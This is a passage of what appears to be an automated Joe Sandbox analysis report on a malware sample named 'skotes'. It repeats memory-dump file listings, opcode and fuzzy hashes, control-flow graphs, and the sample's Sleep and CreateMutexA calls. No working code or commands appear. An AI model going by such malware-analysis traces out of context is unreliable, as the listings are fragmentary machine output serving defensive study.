                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 7269685ed230a19c45dc20bd29f5ee14161ac58d7864c2800d872d7db058c7c3
                                                                                                                                                                                                                                          • Instruction ID: 99b1a6cffa49cd17d408242d267623d0237ec5c03d7e15c8d212ef3eda36331b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7269685ed230a19c45dc20bd29f5ee14161ac58d7864c2800d872d7db058c7c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A312A31A051049BFB18AB78DCC976DBBE2EBC6310F24C299E428A73D1D7759981C752

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 124 b7a418-b7a438 128 b7a466-b7a482 124->128 129 b7a43a-b7a446 124->129 132 b7a484-b7a490 128->132 133 b7a4b0-b7a4cf 128->133 130 b7a45c-b7a463 call b8d663 129->130 131 b7a448-b7a456 129->131 130->128 131->130 134 b7a93f-b7a994 call ba6c6a * 4 Sleep CreateMutexA 131->134 136 b7a4a6-b7a4ad call b8d663 132->136 137 b7a492-b7a4a0 132->137 138 b7a4d1-b7a4dd 133->138 139 b7a4fd-b7a916 call b880c0 133->139 160 b7a9a7-b7a9a8 134->160 161 b7a996-b7a998 134->161 136->133 137->134 137->136 140 b7a4f3-b7a4fa call b8d663 138->140 141 b7a4df-b7a4ed 138->141 140->139 141->134 141->140 161->160 162 b7a99a-b7a9a5 161->162 162->160
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: c00c09d0aa8ef3dcfcba93e1ab1074c15d13dfbd91433b1c91080f1e0f3dbcb4
                                                                                                                                                                                                                                          • Instruction ID: 0f1261f7b5251403f83977f5af44bc6a2d3b7deaeb785f038a1a0058627569bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c00c09d0aa8ef3dcfcba93e1ab1074c15d13dfbd91433b1c91080f1e0f3dbcb4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5316E316041009BEB18AB78DCC9B6DB7E2DFC5314F24C299E0289B3D5E7B699809793

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 164 b7a54d-b7a56d 168 b7a56f-b7a57b 164->168 169 b7a59b-b7a5b7 164->169 170 b7a591-b7a598 call b8d663 168->170 171 b7a57d-b7a58b 168->171 172 b7a5e5-b7a604 169->172 173 b7a5b9-b7a5c5 169->173 170->169 171->170 174 b7a944-b7a994 call ba6c6a * 3 Sleep CreateMutexA 171->174 178 b7a606-b7a612 172->178 179 b7a632-b7a916 call b880c0 172->179 176 b7a5c7-b7a5d5 173->176 177 b7a5db-b7a5e2 call b8d663 173->177 198 b7a9a7-b7a9a8 174->198 199 b7a996-b7a998 174->199 176->174 176->177 177->172 184 b7a614-b7a622 178->184 185 b7a628-b7a62f call b8d663 178->185 184->174 184->185 185->179 199->198 200 b7a99a-b7a9a5 199->200 200->198
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 07d56bef2e0f4b7f33727a39fecbdc3d248d1a551e3da3b99a6749b5cc22d797
                                                                                                                                                                                                                                          • Instruction ID: c0cda048a2a1bec929f4813e92977ab591c326dc5d43ee5c0e0236bcb1478509
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07d56bef2e0f4b7f33727a39fecbdc3d248d1a551e3da3b99a6749b5cc22d797
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44317B31A041008BEB18EB78DCC9B6DB7E2EFC6714F24C299E0289B3D1D7759981D752

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 202 b7a682-b7a6a2 206 b7a6a4-b7a6b0 202->206 207 b7a6d0-b7a6ec 202->207 208 b7a6c6-b7a6cd call b8d663 206->208 209 b7a6b2-b7a6c0 206->209 210 b7a6ee-b7a6fa 207->210 211 b7a71a-b7a739 207->211 208->207 209->208 214 b7a949-b7a994 call ba6c6a * 2 Sleep CreateMutexA 209->214 216 b7a710-b7a717 call b8d663 210->216 217 b7a6fc-b7a70a 210->217 212 b7a767-b7a916 call b880c0 211->212 213 b7a73b-b7a747 211->213 218 b7a75d-b7a764 call b8d663 213->218 219 b7a749-b7a757 213->219 234 b7a9a7-b7a9a8 214->234 235 b7a996-b7a998 214->235 216->211 217->214 217->216 218->212 219->214 219->218 235->234 236 b7a99a-b7a9a5 235->236 236->234
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: e11d82259e58560f8f1668bc4b4b7f9e9dd9917e35b961d81ef68c7ebd137dd5
                                                                                                                                                                                                                                          • Instruction ID: 9b3a919f4b0be8b27435a8c1038f83ad05d8b039fac15dbe8c1832232136e8fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e11d82259e58560f8f1668bc4b4b7f9e9dd9917e35b961d81ef68c7ebd137dd5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 893148316042048BEB58DB78DCC9B6DBBE2DBC6310F24C299E0389B2D1D7759981D792

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
